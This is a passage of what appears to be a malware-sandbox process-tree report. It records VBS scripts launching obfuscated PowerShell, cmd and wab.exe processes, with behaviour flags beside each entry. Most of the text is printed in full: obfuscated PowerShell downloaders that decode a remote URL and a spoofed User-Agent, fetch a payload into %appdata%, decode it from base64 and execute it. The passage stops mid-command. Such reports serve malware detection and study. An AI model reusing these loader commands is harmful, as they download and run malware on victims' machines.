"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Clyssus='Sub';$Clyssus+='strin';$Flkkser130 = 1;$Clyssus+='g';Function Matfelon($Polemizing){$Dispositionsretten=$Polemizing.Length-$Flkkser130;For($Demeaning=5;$Demeaning -lt $Dispositionsretten;$Demeaning+=6){$Granitizes+=$Polemizing.$Clyssus.Invoke( $Demeaning, $Flkkser130);}$Granitizes;}function colognerne($Bardolatry){. ($Violales) ($Bardolatry);}$Pareira=Matfelon 'EksekMDomoroRadioz TraniF,thelIndusl Te saOttsi/Ondo,5Blok,.Chapp0Gemm. Str.f(ModvgWNondeiF.rvin,atagdHovedoUpaavwOpiums Bi r AlloN I.olT Gro Tumtu1 agin0 Sed,.P.ope0Medio;Macro SmrrWForesiP,rolnPsych6 Bygn4Resis; Damb U,cryx.roba6Zidag4Med e; Mala mbarUnmyovSa to:Produ1 Inde2S,nds1Choir.Pause0Pa,li) Scr, ineGMell eNo,coc TartkUbalao.gnki/Phot.2 B,de0Phaeo1Repur0 Bows0Goujo1 Pseu0 Skel1Stenk K.ystFAdjudiDeta.rStjereDi,crfUdmajoSociaxGlau./ Hypp1St.ne2Lsekl1 Lgem.Frpla0Hjert ';$Klhale54=Matfelon 'OvermU FilmsSubeneUlyssrSlink-DrikkA.edbygSu dheCat,lnJ,stitSk id ';$Termagantism=Matfelon 'DiplohVa.outIndvit Kagep morfs Ant :Ferd,/ Vi,k/uni ajTa,dloNa bocHjlp,cThorpuPersop StrmaKaps tLysozi .ndeoFor,unOversa AfstlAstigsSldnicPachai MejneTilfrndestac StateSkywr. ArneoBegavr.eurogDevou/AudibzPhytiaDiskurKltriab,agu/KvaliGGriserSo itaUnsucp Sti hjusteyIndus.NicottMolaroForedcBiog, ';$Wergilds=Matfelon 'Merel>Intro ';$Violales=Matfelon 'SlaaeiHaereeSicu xI,tro ';$Haycocks='Villianousnesses';$Brokbaand = Matfelon 'BeastekoreacForefhpredbo.nswo fier%WageraSandsp BeggpValkydRe.leaHje.ttPatulaSmigr%Spurw\ PaalT NeoduUlykkb rusteKata.rSvirrc Aft.u TreelNumbeoMo,brt T.lmoP.evixAntiliA,varn K it.SpejdMBe anuRapinlAntem S dde&H,lvf& .nvi N.wsgeGstebcS bexh,ftenoNaale Fabr tRunar ';colognerne (Matfelon 'I.kli$Udsnig Syttl neioEchiubAvnblaFilodlWinkl:SlinkS ForsuAffaib LejeaUndereFrihorelaeoaDeklit C.ariBilino TermnDrill=Aands(Baisscs attm Mel.d Solo .niau/FororcDulia Misti$Poly,B Trivr.egumoPulvekBetoib nauaJesseaInitinSan,hdOs.er)Porta ');colognerne (Matfelon 'Karam$Adg,ngunvanlOperaoAfk,lbElo eaTaarelAcaca:GrovbRTu teohomeotAtomvo.esout,ingsibeautlTry ulAir,r=F,irt$ Vin,TCycloeIndterskumlmblokbaCretig Humia Nontn Sam.tShyinihistrsSoun,mbrner. LysisKvalip.metilFl gdiHegletGrun,(Im,as$PatenWStriveUnbolrOcyrog GjaliIradel ThandBoarwsGunme) Hydr ');$Termagantism=$Rototill[0];$Faucitis= (Matfelon ' Ddte$SvinggFngsllBelieoCouthbA deraUnasslJ,skh: ,uthHFleera bre aPreconChokodtvange IllonNor bsSlamb=sov mNS.agee .orewKra.t-NglesO Ligeb No djU.soreEnsilcSkolet A.ra BelloSbokseyAvancs Damstumuliesuscim ishh.YomerNSkrmre VriktEffdr.DkninWBr ggen tiob DamnC.artelPuelciSodfaeNinutnUklart');$Faucitis+=$Subaeration[1];colognerne ($Faucitis);colognerne (Matfelon 'Le nn$FlsomHGavtyaSpiroaMislonKre edSep.reperfenKurersArmch.UncauHTri.oeUnknia Munyd wam.eHellerPupars r ci[Shair$mi,jvKGudmolBirodh Knira cri.lMonsteForsg5,rutc4Mater]Entoc=Drear$ Ter,P Vig.aHacenrPaeane Nu.liSemirrP.ovoaZigza ');$dualismens=Matfelon 'Kanto$S idtHHovedaInte,a skibnSiev dRedepe.nodenSocias ncen.reklaDReveroG.ycowLadcynSpi,elNonseoTechnaSyndrd PapiFCestriFlelslUk,seeAvers(.eeve$MisadTBe.ege Un,trSw,rdmStowiaUreteg AnglaPerion PenstD.viaiFanebstrdesmUn bs,Frizz$RegloRTacittSporbsIsbjr)Hvlvi ';$Rts=$Subaeration[0];colognerne (Matfelon 'Bagla$ Ju.kg S.nflTegneoMycopbHalvfaKnopilFem,e:D,terS,tjeraStkysrMela kPseud=Elekt(SkimmTsjle eFlosssLins tIm.ed-Mono,Penge,aPendetIrrigh Cart Ta s$PrivaRTolertYak tsReval)Kompl ');while (!$Sark) {colognerne (Matfelon 'beda,$Anesog kidelUnds oBoutibDkmanaU.derl Vigi:ArkivUDagtjnGrap,qCystiuLustieForb.sSignitZiggee T esdChrom=Ambit$Kretct.vorirFaradu HoveePosha ') ;colognerne $dualismens;colognerne (Matfelon 'ApneuS NonttBarbiaOutrar UrgatEnest-OveraSDy,pelMejere raadeShawlp Anom M,tap4Ma.ni ');colognerne (Matfelon 'Salpi$brydegPrepalFdekdoS,cilb Ka ya,onoll Kur,:BortlSCostbaPaydarTabelkPenet=Gonor(EmuerT Pri.eRejans s estTamme- alaPTigroaTranst ,ordhTilke Agit$jarldR.attet ForhsAn ig)Sonar ') ;colognerne (Matfelon 'Fortr$StoragLoka,lCuratonereibLkkera ,eoflBowst:CerciM L mei Teg sprogrb Anate,toracCollaaenganmEvenneEnbaa=Friti$hyp rgSammelfejlroHeterb gtnaRegiolBornh:BriarDChurceRensnvBrkndo LurknT,ona+ F an+Kldni%Vi ks$D picRLife oIltogt armbo F,avtBut.kiKultulCanewl Imam.stagecEnalioDefsauHolarnReatttFa,tl ') ;$Termagantism=$Rototill[$Misbecame];}$Capacitation=291675;$Kittycorner=29529;colognerne (Matfelon ' Epid$ F,rugForeglHj,eloW pedbUdeleaLigerlSster:E,ektPAngioaAlluvd Sa pdTogetediskorMonteo AftvkV brakMennee ReeasBegiv navne=Konf, Neu GParate T.ilt ahab-Inte.CKipseoOmstdnen latUdpinebekldn R.vnt ,rad Enkep$TillgRAdopttSimulsPerik ');colognerne (Matfelon 'Bulla$UnremgOplivl Opspo D ffbInnleaUnbell,traf:Seri.ATidshrEskadmF undaHomoln.aktuiTil,a .yste=Glauc Sodav[SurmlSAlinoyplanksT rmet OdleeBygg,mPri.i. WineC.upero A,kinMada.v Opr,eInkonrDorsotKruci]Irrat:Unten: Te mFBldder sem.opetalm CuptBSulphaCo,mosOffeneKlemn6.reas4HerreS Undet .aksrPremeiChronnDdl.rgDis,u( Alam$ SpecPHjforaOprykdConstdMiredeCabacrS,apho KragkSkaldkIncone Sa.fs,elta)Daint ');colognerne (Matfelon 'Tussu$Ls.ergPicoglmgbunoTallybNyvura S,anl,ramp: EmbrR ,uena.atinyGenerlFabuleLe ensRabars B nk Camp =Konc. ,lve[RethaSCitr yHidfrsOverhtTitale,lowsm,rugg.m,ndeTLam.ne.halaxKarnetBon,e.GorgoEPrep,n IniocUnappoOprindAccepiR.itanAleurgStive]Forve: kaeg:S,perA MushS rinC.yrinIUncomISkr.i.UnderGAffekeTritithjlpeSLubritunf irrelapiAlgernArsengChart(Affi.$StaliA Ver.rFremsm Nonba KommnAdu.bi K.ap)Hecto ');colognerne (Matfelon 'Vrema$Sp rtgSexholVacuooV thabchloraS,leklFocus:SpidsKU,erlo Sortd ResteKnkprsOnd,kkanmelrArresi TelefAkutbt Spice Dd krCaulostroch9Unfor4Xenop= Mani$BoondRKobelaFolkeyPanthlNoncre UnemsSolsos ruge.UnearsThyrsuAg,erbElektsGhitat RequrLnestichorinBa segHagba(Hu.ki$GentiCAmreeaUdsklpTricoaU dancpr duiLnpautRejstaForsktAdap.i luffo Ced,nC,ton, Utm $Is laKMea ni G.letVes utN.nliyWarkpc HyenoUdst.r.orhanFordreTriparDemag)Rgfor ');colognerne $Kodeskrifters94;"
10⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tuberculotoxin.Mul && echo t"
11⤵
PID:6704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Clyssus='Sub';$Clyssus+='strin';$Flkkser130 = 1;$Clyssus+='g';Function Matfelon($Polemizing){$Dispositionsretten=$Polemizing.Length-$Flkkser130;For($Demeaning=5;$Demeaning -lt $Dispositionsretten;$Demeaning+=6){$Granitizes+=$Polemizing.$Clyssus.Invoke( $Demeaning, $Flkkser130);}$Granitizes;}function colognerne($Bardolatry){. ($Violales) ($Bardolatry);}$Pareira=Matfelon 'EksekMDomoroRadioz TraniF,thelIndusl Te saOttsi/Ondo,5Blok,.Chapp0Gemm. Str.f(ModvgWNondeiF.rvin,atagdHovedoUpaavwOpiums Bi r AlloN I.olT Gro Tumtu1 agin0 Sed,.P.ope0Medio;Macro SmrrWForesiP,rolnPsych6 Bygn4Resis; Damb U,cryx.roba6Zidag4Med e; Mala mbarUnmyovSa to:Produ1 Inde2S,nds1Choir.Pause0Pa,li) Scr, ineGMell eNo,coc TartkUbalao.gnki/Phot.2 B,de0Phaeo1Repur0 Bows0Goujo1 Pseu0 Skel1Stenk K.ystFAdjudiDeta.rStjereDi,crfUdmajoSociaxGlau./ Hypp1St.ne2Lsekl1 Lgem.Frpla0Hjert ';$Klhale54=Matfelon 'OvermU FilmsSubeneUlyssrSlink-DrikkA.edbygSu dheCat,lnJ,stitSk id ';$Termagantism=Matfelon 'DiplohVa.outIndvit Kagep morfs Ant :Ferd,/ Vi,k/uni ajTa,dloNa bocHjlp,cThorpuPersop StrmaKaps tLysozi .ndeoFor,unOversa AfstlAstigsSldnicPachai MejneTilfrndestac StateSkywr. ArneoBegavr.eurogDevou/AudibzPhytiaDiskurKltriab,agu/KvaliGGriserSo itaUnsucp Sti hjusteyIndus.NicottMolaroForedcBiog, ';$Wergilds=Matfelon 'Merel>Intro ';$Violales=Matfelon 'SlaaeiHaereeSicu xI,tro ';$Haycocks='Villianousnesses';$Brokbaand = Matfelon 'BeastekoreacForefhpredbo.nswo fier%WageraSandsp BeggpValkydRe.leaHje.ttPatulaSmigr%Spurw\ PaalT NeoduUlykkb rusteKata.rSvirrc Aft.u TreelNumbeoMo,brt T.lmoP.evixAntiliA,varn K it.SpejdMBe anuRapinlAntem S dde&H,lvf& .nvi N.wsgeGstebcS bexh,ftenoNaale Fabr tRunar ';colognerne (Matfelon 'I.kli$Udsnig Syttl neioEchiubAvnblaFilodlWinkl:SlinkS ForsuAffaib LejeaUndereFrihorelaeoaDeklit C.ariBilino TermnDrill=Aands(Baisscs attm Mel.d Solo .niau/FororcDulia Misti$Poly,B Trivr.egumoPulvekBetoib nauaJesseaInitinSan,hdOs.er)Porta ');colognerne (Matfelon 'Karam$Adg,ngunvanlOperaoAfk,lbElo eaTaarelAcaca:GrovbRTu teohomeotAtomvo.esout,ingsibeautlTry ulAir,r=F,irt$ Vin,TCycloeIndterskumlmblokbaCretig Humia Nontn Sam.tShyinihistrsSoun,mbrner. LysisKvalip.metilFl gdiHegletGrun,(Im,as$PatenWStriveUnbolrOcyrog GjaliIradel ThandBoarwsGunme) Hydr ');$Termagantism=$Rototill[0];$Faucitis= (Matfelon ' Ddte$SvinggFngsllBelieoCouthbA deraUnasslJ,skh: ,uthHFleera bre aPreconChokodtvange IllonNor bsSlamb=sov mNS.agee .orewKra.t-NglesO Ligeb No djU.soreEnsilcSkolet A.ra BelloSbokseyAvancs Damstumuliesuscim ishh.YomerNSkrmre VriktEffdr.DkninWBr ggen tiob DamnC.artelPuelciSodfaeNinutnUklart');$Faucitis+=$Subaeration[1];colognerne ($Faucitis);colognerne (Matfelon 'Le nn$FlsomHGavtyaSpiroaMislonKre edSep.reperfenKurersArmch.UncauHTri.oeUnknia Munyd wam.eHellerPupars r ci[Shair$mi,jvKGudmolBirodh Knira cri.lMonsteForsg5,rutc4Mater]Entoc=Drear$ Ter,P Vig.aHacenrPaeane Nu.liSemirrP.ovoaZigza ');$dualismens=Matfelon 'Kanto$S idtHHovedaInte,a skibnSiev dRedepe.nodenSocias ncen.reklaDReveroG.ycowLadcynSpi,elNonseoTechnaSyndrd PapiFCestriFlelslUk,seeAvers(.eeve$MisadTBe.ege Un,trSw,rdmStowiaUreteg AnglaPerion PenstD.viaiFanebstrdesmUn bs,Frizz$RegloRTacittSporbsIsbjr)Hvlvi ';$Rts=$Subaeration[0];colognerne (Matfelon 'Bagla$ Ju.kg S.nflTegneoMycopbHalvfaKnopilFem,e:D,terS,tjeraStkysrMela kPseud=Elekt(SkimmTsjle eFlosssLins tIm.ed-Mono,Penge,aPendetIrrigh Cart Ta s$PrivaRTolertYak tsReval)Kompl ');while (!$Sark) {colognerne (Matfelon 'beda,$Anesog kidelUnds oBoutibDkmanaU.derl Vigi:ArkivUDagtjnGrap,qCystiuLustieForb.sSignitZiggee T esdChrom=Ambit$Kretct.vorirFaradu HoveePosha ') ;colognerne $dualismens;colognerne (Matfelon 'ApneuS NonttBarbiaOutrar UrgatEnest-OveraSDy,pelMejere raadeShawlp Anom M,tap4Ma.ni ');colognerne (Matfelon 'Salpi$brydegPrepalFdekdoS,cilb Ka ya,onoll Kur,:BortlSCostbaPaydarTabelkPenet=Gonor(EmuerT Pri.eRejans s estTamme- alaPTigroaTranst ,ordhTilke Agit$jarldR.attet ForhsAn ig)Sonar ') ;colognerne (Matfelon 'Fortr$StoragLoka,lCuratonereibLkkera ,eoflBowst:CerciM L mei Teg sprogrb Anate,toracCollaaenganmEvenneEnbaa=Friti$hyp rgSammelfejlroHeterb gtnaRegiolBornh:BriarDChurceRensnvBrkndo LurknT,ona+ F an+Kldni%Vi ks$D picRLife oIltogt armbo F,avtBut.kiKultulCanewl Imam.stagecEnalioDefsauHolarnReatttFa,tl ') ;$Termagantism=$Rototill[$Misbecame];}$Capacitation=291675;$Kittycorner=29529;colognerne (Matfelon ' Epid$ F,rugForeglHj,eloW pedbUdeleaLigerlSster:E,ektPAngioaAlluvd Sa pdTogetediskorMonteo AftvkV brakMennee ReeasBegiv navne=Konf, Neu GParate T.ilt ahab-Inte.CKipseoOmstdnen latUdpinebekldn R.vnt ,rad Enkep$TillgRAdopttSimulsPerik ');colognerne (Matfelon 'Bulla$UnremgOplivl Opspo D ffbInnleaUnbell,traf:Seri.ATidshrEskadmF undaHomoln.aktuiTil,a .yste=Glauc Sodav[SurmlSAlinoyplanksT rmet OdleeBygg,mPri.i. WineC.upero A,kinMada.v Opr,eInkonrDorsotKruci]Irrat:Unten: Te mFBldder sem.opetalm CuptBSulphaCo,mosOffeneKlemn6.reas4HerreS Undet .aksrPremeiChronnDdl.rgDis,u( Alam$ SpecPHjforaOprykdConstdMiredeCabacrS,apho KragkSkaldkIncone Sa.fs,elta)Daint ');colognerne (Matfelon 'Tussu$Ls.ergPicoglmgbunoTallybNyvura S,anl,ramp: EmbrR ,uena.atinyGenerlFabuleLe ensRabars B nk Camp =Konc. ,lve[RethaSCitr yHidfrsOverhtTitale,lowsm,rugg.m,ndeTLam.ne.halaxKarnetBon,e.GorgoEPrep,n IniocUnappoOprindAccepiR.itanAleurgStive]Forve: kaeg:S,perA MushS rinC.yrinIUncomISkr.i.UnderGAffekeTritithjlpeSLubritunf irrelapiAlgernArsengChart(Affi.$StaliA Ver.rFremsm Nonba KommnAdu.bi K.ap)Hecto ');colognerne (Matfelon 'Vrema$Sp rtgSexholVacuooV thabchloraS,leklFocus:SpidsKU,erlo Sortd ResteKnkprsOnd,kkanmelrArresi TelefAkutbt Spice Dd krCaulostroch9Unfor4Xenop= Mani$BoondRKobelaFolkeyPanthlNoncre UnemsSolsos ruge.UnearsThyrsuAg,erbElektsGhitat RequrLnestichorinBa segHagba(Hu.ki$GentiCAmreeaUdsklpTricoaU dancpr duiLnpautRejstaForsktAdap.i luffo Ced,nC,ton, Utm $Is laKMea ni G.letVes utN.nliyWarkpc HyenoUdst.r.orhanFordreTriparDemag)Rgfor ');colognerne $Kodeskrifters94;"
11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:6472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tuberculotoxin.Mul && echo t"
12⤵
PID:6888

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
12⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6784 -s 328
13⤵
- Program crash
PID:5640

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cvduqf.vbs"
9⤵
- Checks computer location settings
PID:6188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Housewrecker='Sub';$Housewrecker+='strin';$Devoteeism = 1;$Housewrecker+='g';Function Swilled($Skamferingernes220){$Elokvent=$Skamferingernes220.Length-$Devoteeism;For($Rottefrit=5;$Rottefrit -lt $Elokvent;$Rottefrit+=6){$Agnostiker186+=$Skamferingernes220.$Housewrecker.Invoke( $Rottefrit, $Devoteeism);}$Agnostiker186;}function Dentata($Tortoises){ . ($Rabarberkvarterer) ($Tortoises);}$Filthified194=Swilled 'KolacMminiroGods zReenuiUddellmetodl,rchpasapou/In sp5Fo de.Clo r0Tig,e Ovato(.ologWVarmeiAl isnBasked Sa,do DispwCatawsKurse AnalyN Edi TMilie P,yt1,nsha0Multi.colla0 Outs;Tekst AfsvWuvejriServinEk po6Anthe4int.r; Skr, Genmax Ingr6Over 4Under;Bou,g .permrHeksevTomat:Inieb1Udtry2Gylde1T gte.Komma0Since)Alumi StenGVoldgeindv cI cenk R.nto,mper/Vens,2 Pr,c0 agg1T.edj0Ba ls0Pro e1Hekse0Kron 1 Part Phil.FSlavoiForflrtenaceNon lfE tero MacrxM ure/Heter1entre2Viden1vagin.T lsy0p eci ';$Tenorite=Swilled 'Re viUPallesSnappeHermerPaste-SkaanAachilgThymaeTuckenSalgstFjerb ';$Heltindes=Swilled 'ViskehPengetWays tPhysep hitesJdeki:Livel/Benga/Meth.tPerr a Se.rtPhlegsImbareSandwlSkalpeM,sbocsp rstEmigrr,eneroKagemn Mil iForebc EstrsFremd. Berec AlymoAnven.Den mzC.nvawSleyi/Nons.sSt dsdIn fa/ Ko.fKRein rAfskiuS.ippb.yggeiPy,am.Tigerm.oltasCau.eomagni ';$Elkslip=Swilled 'Stolz> Forp ';$Rabarberkvarterer=Swilled 'a endiNoncoeRedefxCrapu ';$Handelsuddannet123='Egyptologernes';$faksimilet = Swilled 'Elekte B nkc NglehKomm.oPtyal edva%SkomaaBlottpSpisepAfsl.d BuffaFladptHe.mea.rmin% ffe\EfterH BirkeI,divmB nzaaCrumbtWeedeoVerdebAtolmropretaResonnBispec Pr,shC.rkuiMuni.aTilsytDiscoe Pho..NdvrgE HydrnCowagfSad m omeo&Uvaer&Flerv MuseeAfridc I.deh.oxalo Nrin C,ntat Oron ';Dentata (Swilled ' Syst$Fedlag StralIsmejoMaksibZygota annelStipi:Stet,T Middh rd peSpildrRep ei Bolia WititShindrPorioiStenscSu ersS eez=Lufth(HacktcJacuamMariodTorst Ref,r/PentycPromi P rio$kommef oresa Koekk Fe asUnderikonf mKageri abetlimpededisaltpecul)Lunkh ');Dentata (Swilled ' Amby$UgletgNgstelAuto.oMa onb TenoaDu lllB,dui:StrabFTyksarsp,rmiSanggtCob,eaMejsegGu,phe.embol Coges lerbeOversnglsnisSemi.=Blinu$leverH GravebegrelBlosttRedouiRoyalnLiniedsy tee Samms Hali.G nuds .gohpEvenwlNonfeiudpibtU.kra(Studi$istanEK.efol dbrik RaabsRaggel xtroiKaolipPetre)nond ');$Heltindes=$Fritagelsens[0];$Epitendineum= (Swilled 'Iltni$ Wrong s colLanceoUngivb FrucaCachilOplft:SnarlT rogeMuscikdaa,lnViv,si ShopkPr,pou HermmPolysuRapsedDip od ForhaPhasmnUnex,nNon.ce Fanatsp,en=CytomNforlieUnderwsi,on-S,atuOOmvurbLegiojaba,te HidfcDeltktHusdy udleSE.ployNosocsAllegtLejnieSubpim Svve.ImmunNWatcheBar,tt rill.VinduWBla,heBr.inbGaldeCCrosslBrulyiAnimeeCirkunFaunat');$Epitendineum+=$Theriatrics[1];Dentata ($Epitendineum);Dentata (Swilled 'Pre,e$ UddaTSurfee ScrekaitutnNo opiglendkParaluInd.rmSuperuhumerdkalved Si va,ation Re,unskovlePomfrt Kha . tweaHRaadzePressaTassadPlurae,ceitr Frekstedde[ K it$uvantTA,adeeVirkenfortpoV.nosrFllesiDip otMale.e Pr,s]Energ=Gylpe$Zo.meFCy luiincublp,raltApparhS.aali TrolfAvlsfiGetateOrdnedT ldk1Excen9Bhmnd4Colea ');$Familietraditionernes=Swilled 'Semie$ KatcTMenageB rdkkRen en Ta,si GroukElectuGenhumE.umeuDormid.lectdFrag,akundenCl.manCleareSelvbtAlleg.PinniDDeceioElusowBremsnmicrolP ncto Sp.faTab.ld S.ahFUppisiPeritlVaccieUncoa(Karbu$Ho,olH Phote StuflparamtE ergiWorktn Cambdunil,eDrak.s .rom,Prior$ca,ilF EnearFjerde,ompumMucidmBagateReverlCoc,uiNond,gMagmatFolke)Pumph ';$Fremmeligt=$Theriatrics[0];Dentata (Swilled 'Sphae$UncolgEgenvlEsopho nterbSup ra ranul Pigg:Da aeT Acona U,derAtomhvBel ae spellImpediYeme,gtelttePre arG.niteFe,th1Fje n1Pe.so8afs.u=Ooste(.onseTEmotie RecisAvifat nclo- UniaPPlasmaD.saitgesanh Notu Sours$Cou.tF FlybrFa speTheremTermimS rupe Embrl Bra,iUlivsg DanstTiara)K ngr ');while (!$Tarveligere118) {Dentata (Swilled 'Dekli$Knospg Eyrel Kr,mo Suprbslew.aerythlOpgiv:S resANoncrl Unenk Uneaa Dogll MonaiDitrizKr,mie.pedasFrugt=Preda$.ystetdecatrBitteuDe,ineVak.p ') ;Dentata $Familietraditionernes;Dentata (Swilled ',rfisSC mpetTartra,elisr HjretLeopo-,gedaS.emaslspa,ieAnkese SyripRejuv Virks4Ind g ');Dentata (Swilled 'T nsu$ ,alagS.artlTagetoHylozb Pa tanonvvlKonst:ContrT Frema Skjor KlarvMisfoeeluanlHenstiJvn.ggTotone.lererJe nbeMesep1Stere1H per8Gift = blo,(SculpTPo ycePunaisResertu.nar-Para.P legnaStraet Pse hNv,in .ispu$BesaaFOutfrrOverieReargmPa.cimBge reSynftlBestiiZooxagRoadwtBrahm)Ubegr ') ;Dentata (Swilled ' excr$ laygg ,ogel,orngoBvedebS,orba MivrlTitra: jlesAbeboefF,rhokProten S,ppaObstrp Pro pS.ncreUdhuldSho,tecolinsU,igt= chur$ o vagCapealPropooTeutobFagmeaDves.lFi,ke: P.ngBGen.reLinchfSubeqoKvaler DegrdSuperr T udi Tvrvn KurtgSke usSnootmLeveriSafthdPennelOpladeWalycrKvartncarnaeTilr.sBro h+F,tti+Prest%Domst$bas.dF a,orrForbriUdflyt askiaRestagFan,aeH,reul,inges DomaesupernTank sp esk.Lancicafdr oEfteru.uffin Stact ucke ') ;$Heltindes=$Fritagelsens[$Afknappedes];}$Enkindles=304898;$Frifunden=29093;Dentata (Swilled 'Farid$Dar.egRh,sulEfteroPennab O ova M,galSup r: A.trCHudore OversOllasuCy,torNedbra Dho.lLivsm Colle=Idiot M,chaG onineUopretUnarr-SklveCAcronoNonatn.dmont ProcePresenIncestInter kali$ KislFForflrTotaleudelamForvnm SpeceanstrlFre.li RequgNulputAse.s ');Dentata (Swilled ' ell$Radi.g DeltlClintobrspab .robaGrasslBadut:,ndocSSpredkF.brouGotc nCertiksteree Ske.r DrifnIntraeSedes Opga,=Begon Carb[AmnioSContay Sydns,achytMesoteTrkkem.issi.EnosiC InfooW.ttonDemisv F mieInte r,hilotZoril]Upbuo:Hexas:AtlanFGe nerSjusko LimmmOv rsB nbeaAnti,sjackeePl,ur6Hepto4A renSAcceptNeutrrRevo,iManusnDecimgGinnl(Langh$Bes,oCTrawleOli,tsK emeuUnfelrTunemaTubi lM hog)Gunst ');Dentata (Swilled 'Livsb$MentagForbelReinsoVend.bCant aEctotlJubil:LdepoO .astpMbytegKlager Divie ,avlt Si,cs.ivst furmi=incom .edag[RegenSOmrahyAuslas EasttM.croeStraamErind.Midt,T Sto eFlo.ixbort tE,omo. MedmEStra.n abaicI,teroF zysd Lreri ,vern JvnbgFl,ke]Fakul:Overg:KonstAOversSOrdodCPelteI angIChoks.OrkesGForhae Foxft,ateaSNoneptF.dstrInte,iSissinSidelgBongr(Prv,l$SammeS loadkAngeluEnehen RespkUnarmebeskfrSwimmn xceeGuaci)Hyldn ');Dentata (Swilled 'Smrfe$ Hg yg HeadlMaaleoKommobSpor aU.eselMer.t:brachDSygeme klipcEnanto InterUndera .fbrtNoteriMi lioSnebln nbeiiFon,usMurertSame,=Solid$InterO SandpT.toagSimplrBlysteAmitotVideosAutot. Vip.sAphanu.ampabEskapsAcylatSjuftrNjagti AeronCli,cgleksi(Ov.rc$SemihEFishbnFa,tak Cry.iAngionLispcdPurolltreleeL,mousMisal,Foedt$AvifaFFescur BejaiGuarafBau.ouHvsesnTwatcd SynaeAkternStorj) Ob e ');Dentata $Decorationist;"
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:7108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hematobranchiate.Enf && echo t"
11⤵
PID:6012

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 184
12⤵
- Program crash
PID:6904

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fhrdes.vbe"
9⤵
- Checks computer location settings
PID:6912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dynelftningens='Sub';$Dynelftningens+='strin';$Theca = 1;$Dynelftningens+='g';Function Vikarieret($Pinole){$Sitres=$Pinole.Length-$Theca;For($Spatiummernes=5;$Spatiummernes -lt $Sitres;$Spatiummernes+=6){$Uforskammethederne+=$Pinole.$Dynelftningens.Invoke( $Spatiummernes, $Theca);}$Uforskammethederne;}function Sigloi($Erhvervsarbejdets){& ($Fllesanlggenes) ($Erhvervsarbejdets);}$Variansanalyser213=Vikarieret 'UnconMHusleoReggazv,ttei Trkfl FjumlSvampaFortj/barqu5Ko,bi.Samme0arch, Kompa(Tr.mpWUn njiecttynDcbvadSamf.oTidsawReutesBygge N ndiNK,medTTran A.van1 pris0 T,gt.Nond 0Las e;.ovsc Acid,WS,ithiFrasenDem,p6Dialy4 Vind;Teg,i B,ghxErrit6 St.a4Detai;Septe Concr PhecvStuve:Trans1 ,raf2Snvle1M,red.Udkra0 Reps) blin BetryGBrsste.fprecHoersk Dicho Geze/Si,le2Nodos0Endli1Livmo0Fagkr0 Regn1Vi,is0Redef1Klsrh fal nFLatinimisfor Syske DyssfViolaoJimp.xBukse/ ore1Demon2 Bun,1 Inds.Cymt,0 ovse ';$Lgtehammer=Vikarieret 'Gam,lUNatursorkeseKontorhoved-Jo rnAB thygAsaheeMultinsextutUnabn ';$Virke=Vikarieret ' ngelhTilpatAnteptSpapepSm,lesHal,i:roeka/ En.a/Tir,ltUnpriaNoncat ,lons NonteAnmellH mrseSu,ercSkrivtFluatr I ioo I,son trapiTjurhcOneilsFormu. MasscGle.eo.nsha.,rikazHydrowFejlb/g.usssFootpd Uove/UnderGBodere tlasarbejt EoreaAgnifpTalleo errisSta.w..ivnicRg.jluT,emprOsteo ';$Delggers=Vikarieret 'tite.>P ilo ';$Fllesanlggenes=Vikarieret ' En,yiFor.re A laxKhir, ';$Macrogastria='Cowpunch';$Charas = Vikarieret 'JeteheYderlcTeaseh IntroMorti Spec%SlapsaBd,nipbidevpS.nildHemataMis at Angla ndd%,ills\Ja nePTer irNeuroo S pof PjaliAchrotquotirUdsmyaInfortUndeteUd.nsn ,gersSpong.SpytnSGenerh TopeaPucco ,pec&Ndsig&Unsel Fe teSer ecLaag,h Hypeo F,im SkydetTired ';Sigloi (Vikarieret 'Appas$SporogcankelW,lsooPe.sibSh.maa ufflWhimp:InvenTreinvrNeddyy ttecpH.rtit LenkoBantenRoseeiDemonz KlipeSkade= .etr(Kredscti lom TowndAmalg Vapou/Vgtafc,npar Subah$VolutCOu.fehA inea Ba nr ReklaEpidisDob e)Kledi ');Sigloi (Vikarieret 'Filag$KapregPollel Pe boHard.b StjeaGenopl utin:Up.liK GeoboOversn MonofBegreeMartyk Bowltshal e,ensdrdenisnS,rogeK.lde=nutcr$Afsp.VSpleniFightrRenumkAar.lePorph.afhrds.ovedpUpbinl T.buiLoxo.tTilsj(Fljka$NonpeDMilteeStan,lTho ggIndivg VinkeSisker Ethns In o)Danne ');$Virke=$Konfekterne[0];$Sexfilmenes= (Vikarieret 'T awl$ 